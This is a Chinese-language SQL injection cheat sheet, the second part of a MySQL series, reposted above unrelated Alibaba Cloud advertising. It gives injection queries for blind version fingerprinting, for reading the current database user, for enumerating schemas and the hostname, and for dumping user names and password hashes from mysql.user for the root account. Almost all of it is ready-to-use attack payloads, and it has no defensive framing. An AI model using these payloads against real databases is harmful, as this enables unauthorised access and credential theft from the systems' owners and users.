標籤:
上接mysql篇(1)
測試資料庫版本
1.使用內建函數
version()
@@version
@@global.version
examples
select version();
SELECT * FROM Users WHERE id = ‘1‘ AND MID(VERSION(),1,1) = ‘5‘;
mid() 用於截取字串,用法 mid(字串,起始位置,截取幾個字元)
備忘:
如果資料庫運行在windows的機器上的話輸出會帶上-nt-log
2.使用特殊代碼
1 /*!50094eaea*/ ; False 如果版本在5.0094或以上
1 /*!50096eaea*/ ; True 如果版本在5.0096以下
1/*!50095eaea*/ ; False 如果版本是5.0095
備忘:
當你不能將任何sql帶入注入位置查詢的時候,這個方法可以用於檢測資料庫版本
資料庫憑證
table mysql.user
columns user password
current user user() current_user() current_user system_user() session_user()
examples:
seclct current_user ;
SELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = ‘root‘-- (Privileged)
資料庫名字
table information_schema.schemata mysql.db
columns schema_name db
currentdb database() schema()
examples:
select database();
select schema_name from information_schema.schemata;
select distinct(db) from mysql.db
主機名稱
@@hostname
example
select @@hostname;
sql注入知識庫-mysql篇(2)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
